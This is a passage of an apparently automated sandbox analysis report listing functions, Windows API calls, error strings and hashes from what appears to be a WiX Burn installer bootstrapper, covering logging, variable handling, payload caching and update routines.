                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                                                                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2407829081-3274134579
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6909536cea939e457d06af7dd39159a9485f96c4eef907e04245aa7c78e76c8f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 14f084e3582ae8d8b696afe8f1253c64ce904794344608300502a3f933135040
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6909536cea939e457d06af7dd39159a9485f96c4eef907e04245aa7c78e76c8f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3441C072E8123DABCB219B548C49BE9B778FB10710F1142A1F918F7245DA70DF809BD2
                                                                                                                                                                                                                                                                                                  Function 00867FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00867FC2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 008681EA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to write variable value as number., xrefs: 00868194
                                                                                                                                                                                                                                                                                                  • Failed to write variable name., xrefs: 008681D1
                                                                                                                                                                                                                                                                                                  • Failed to get numeric., xrefs: 008681BC
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 0086809D, 008680F3, 00868134
                                                                                                                                                                                                                                                                                                  • Failed to write variable value type., xrefs: 008681CA
                                                                                                                                                                                                                                                                                                  • Failed to get string., xrefs: 008681B5
                                                                                                                                                                                                                                                                                                  • Failed to write variable count., xrefs: 00867FDD
                                                                                                                                                                                                                                                                                                  • Failed to write variable value as string., xrefs: 008681AE
                                                                                                                                                                                                                                                                                                  • Unsupported variable type., xrefs: 008681A7
                                                                                                                                                                                                                                                                                                  • Failed to get version., xrefs: 0086819B
                                                                                                                                                                                                                                                                                                  • Failed to write literal flag., xrefs: 008681C3
                                                                                                                                                                                                                                                                                                  • Failed to write included flag., xrefs: 008681D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2118673349
                                                                                                                                                                                                                                                                                                  • Opcode ID: 211436bbb4cc66dfddb3a722c81c0acf69e74231cbee9e3d836a1ea0431fce44
                                                                                                                                                                                                                                                                                                  • Instruction ID: a47c58e1ec4238adf154deb82d67f0784bef8340b5d6e0ac4044fa1c90a17f54
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211436bbb4cc66dfddb3a722c81c0acf69e74231cbee9e3d836a1ea0431fce44
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D471B232D0061AEFDB129E68CC41BAE7BA4FF06314F124221FA19E7651CF34DD169B91
                                                                                                                                                                                                                                                                                                  Function 008797B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0087A843,00000000,00000000,00000000,?,00000000), ref: 008797CD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008797DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4102: Sleep.KERNEL32(?,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00864DBC), ref: 008A4119
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008798E9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload in working path: %ls, xrefs: 0087980C
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00879801
                                                                                                                                                                                                                                                                                                  • %ls payload from working path '%ls' to path '%ls', xrefs: 00879894
                                                                                                                                                                                                                                                                                                  • Failed to verify payload hash: %ls, xrefs: 00879875
                                                                                                                                                                                                                                                                                                  • Moving, xrefs: 0087987F
                                                                                                                                                                                                                                                                                                  • Failed to verify payload signature: %ls, xrefs: 00879838
                                                                                                                                                                                                                                                                                                  • Copying, xrefs: 00879888, 00879893
                                                                                                                                                                                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 008798D7
                                                                                                                                                                                                                                                                                                  • Failed to move %ls to %ls, xrefs: 008798C1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1275171361-1604654059
                                                                                                                                                                                                                                                                                                  • Opcode ID: f0e8391a6af20e4c5f89ba3d7a0d5210f991321604a6d5eac54b4bdfbd3f8ed6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7da4b8f9fbc170a6ca49bf66ec5a3e15f2ec755a6f082a5394e3b5d741955f35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0e8391a6af20e4c5f89ba3d7a0d5210f991321604a6d5eac54b4bdfbd3f8ed6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78310832940625BBDA321A598C46F6B2A5CFF86B60F058134FE58FB395D270DC0096E3
                                                                                                                                                                                                                                                                                                  Function 008665C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 008665FC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00866628
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866636
                                                                                                                                                                                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0086666E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866678
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008666BB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008666C5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00866724
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 0086665A, 0086669C
                                                                                                                                                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 008666A6
                                                                                                                                                                                                                                                                                                  • Failed to backslash terminate system folder., xrefs: 00866708
                                                                                                                                                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 00866664
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                                                                                                                                                                                  • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 325818893-1590374846
                                                                                                                                                                                                                                                                                                  • Opcode ID: f4f045056cd32a9f05ff6a3bf398309fca8255556952b011bd94db28f7d7b4d8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c3b84e67976847458538ecc86f52bea6be5224792513bc974f3c7882b1b955e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4f045056cd32a9f05ff6a3bf398309fca8255556952b011bd94db28f7d7b4d8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3312572D41339A7EB209764EC49B9A36A8FF11750F024265BD14FB281FB789D408AE1
                                                                                                                                                                                                                                                                                                  Function 00873F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00873AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00873FB5,feclient.dll,?,00000000,?,?,?,00864B12), ref: 00873B42
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00864B12,?,?,008AB488,?,00000001,00000000,00000000), ref: 0087404C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2834455192-2673269691
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec21ee9e080bb4712c3d1607ca2583d987864883161db8f8a2fdf48c0b7e9392
                                                                                                                                                                                                                                                                                                  • Instruction ID: 68311116c6713e9c30852b75fa55edbb4eafb42264053e158f766df17f9fb658
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec21ee9e080bb4712c3d1607ca2583d987864883161db8f8a2fdf48c0b7e9392
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F061E671A00A16BBDB11AF38CC42B7677A8FF11340B15D155FD08DB258E771ED908BA2
                                                                                                                                                                                                                                                                                                  Function 00872C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00872C8A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to check for remaining dependents during planning., xrefs: 00872E30
                                                                                                                                                                                                                                                                                                  • Failed to allocate registration action., xrefs: 00872CF3
                                                                                                                                                                                                                                                                                                  • Failed to add registration action for dependent related bundle., xrefs: 00872F8E
                                                                                                                                                                                                                                                                                                  • wininet.dll, xrefs: 00872ED7
                                                                                                                                                                                                                                                                                                  • Failed to add registration action for self dependent., xrefs: 00872F57
                                                                                                                                                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 00872CC3
                                                                                                                                                                                                                                                                                                  • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00872DF4
                                                                                                                                                                                                                                                                                                  • Failed to add dependents ignored from command-line., xrefs: 00872D3F
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00872CD5, 00872DCF, 00872EC4, 00872F39
                                                                                                                                                                                                                                                                                                  • Failed to add self-dependent to ignore dependents., xrefs: 00872D0E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1705955799
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1db91c8b61d6cc37ba8ddd84e0fbff2332f6fe82536595ae61d41a3d3193a7ec
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3dfdd21c7c227cfb0e65b1ff747e20bf85ca7c2d7b54fdae8b692e1b73f1ce82
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1db91c8b61d6cc37ba8ddd84e0fbff2332f6fe82536595ae61d41a3d3193a7ec
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBB17B71A0021AEBDF29DF68C841AAE7BB5FF14310F10C169F819EB259CB30D990CB91
                                                                                                                                                                                                                                                                                                  Function 0087F90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F947
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0087FA2A
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 0087FA4B
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 0087FAF4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to convert bundle update guid into string., xrefs: 0087FA6A
                                                                                                                                                                                                                                                                                                  • update\%ls, xrefs: 0087F9A3
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087FA60
                                                                                                                                                                                                                                                                                                  • Failed to default local update source, xrefs: 0087F9B7
                                                                                                                                                                                                                                                                                                  • Failed to set update bundle., xrefs: 0087FACE
                                                                                                                                                                                                                                                                                                  • Failed to create bundle update guid., xrefs: 0087FA37
                                                                                                                                                                                                                                                                                                  • Failed to recreate command-line for update bundle., xrefs: 0087FA12
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 171215650-2594647487
                                                                                                                                                                                                                                                                                                  • Opcode ID: 939c9eb986b420fdce7ec5eefa02d005417fdf1e3b248c5ef65d884309a2a52f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5564b45a52945e5df61d34d3c16cee2f05a5a52991d5033f812a38b8490640d1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939c9eb986b420fdce7ec5eefa02d005417fdf1e3b248c5ef65d884309a2a52f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23617B31940219ABDF219FA9C845FAEBBB4FB08724F158179FA0DEB256D671DC00CB91
                                                                                                                                                                                                                                                                                                  Function 00864AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsWindow.USER32(?), ref: 00864C64
                                                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00864C75
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create the message window., xrefs: 00864B98
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 00864BF5
                                                                                                                                                                                                                                                                                                  • Failed to set registration variables., xrefs: 00864BDE
                                                                                                                                                                                                                                                                                                  • Failed to set action variables., xrefs: 00864BC4
                                                                                                                                                                                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 00864C06
                                                                                                                                                                                                                                                                                                  • Failed to open log., xrefs: 00864B18
                                                                                                                                                                                                                                                                                                  • Failed to check global conditions, xrefs: 00864B49
                                                                                                                                                                                                                                                                                                  • Failed while running , xrefs: 00864C2A
                                                                                                                                                                                                                                                                                                  • Failed to query registration., xrefs: 00864BAE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                                                                                                                                                  • API String ID: 3618638489-3051724725
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa5a01cc397e8b952a0c9571bcb3486ad1366c882ce2b2b810abe4377c38a5c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 76510f77b6894408830fa67e70e0ab056daf6dd3a7d8dd17390d45eb0341eb5e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa5a01cc397e8b952a0c9571bcb3486ad1366c882ce2b2b810abe4377c38a5c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2241113160161BBFDB265A64CC46FAFBA6CFB01764F025215F814E6741EBB0ED10A7D1
                                                                                                                                                                                                                                                                                                  Function 0087F051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0087F06E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0087F19B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087F17C
                                                                                                                                                                                                                                                                                                  • Failed to copy the arguments., xrefs: 0087F12D
                                                                                                                                                                                                                                                                                                  • UX requested unknown approved exe with id: %ls, xrefs: 0087F0CE
                                                                                                                                                                                                                                                                                                  • Failed to copy the id., xrefs: 0087F100
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0087F089
                                                                                                                                                                                                                                                                                                  • Failed to post launch approved exe message., xrefs: 0087F186
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1367039788-528931743
                                                                                                                                                                                                                                                                                                  • Opcode ID: b70748a4f1daaed367b4c4476e5fac704ae06fa8558d96e87c374d333d4df6b5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95dc6a20f4a6f8b8488e3796508b21cd52aceee5a9d73ff76fdb7d383e34606c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b70748a4f1daaed367b4c4476e5fac704ae06fa8558d96e87c374d333d4df6b5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0131A532A40625EBDB22DF69DC45E9A77A8FF05720F018565FE08EB352EB31DD0087A1
                                                                                                                                                                                                                                                                                                  Function 0087969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0087A7D4,00000000,00000000,00000000,?,00000000), ref: 008796B8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0087A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008796C6
